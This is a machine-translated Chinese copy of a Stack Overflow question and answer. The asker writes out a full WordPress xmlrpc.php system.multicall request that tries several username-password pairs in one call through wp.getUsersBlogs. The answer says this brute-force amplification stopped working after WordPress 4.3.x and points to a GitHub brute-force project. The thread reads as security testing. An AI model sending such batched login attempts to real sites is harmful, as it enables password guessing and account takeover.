wordpress中的system.multicall总是提供不正确的用户名或密码
wordpress中的system.multicall总是提供不正确的用户名或密码
提问于 2022-09-28 19:35:35
我在JMeter.For中使用xmlrpc的任何wordpress站点,如果我在第一个实例中添加了正确的用户名和密码,那么我就得到了正确的输出,但是如果我在第二个实例中添加了正确的凭据(或之后),那么我总是会得到“不正确的用户名或密码”。
POST /xmlrpc.php HTTP/1.1
Host: example.com
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>User1</string></value>
<value><string>password1</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>User2</string></value>
<value><string>Password2</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>回答 1
Stack Overflow用户
发布于 2022-10-05 10:07:18
我玩着同样的弱点,偶然发现了同样的行为。我在XML蛮力项目中发现了这个GitHub问题,讨论了同样的问题。自WordPress 4.7.x版本以来,该漏洞似乎已经得到修补。我还在找这个修补的时候.
更新
我真的很想找出易受攻击的版本,所以现在在安装了无数个WordPress版本之后,我能够发现漏洞可以工作到4.3.29版本。从4.4版开始,它不再适用于我了。
我希望这能让人平静下来,因为它使我的心平静下来。
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/73886924
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号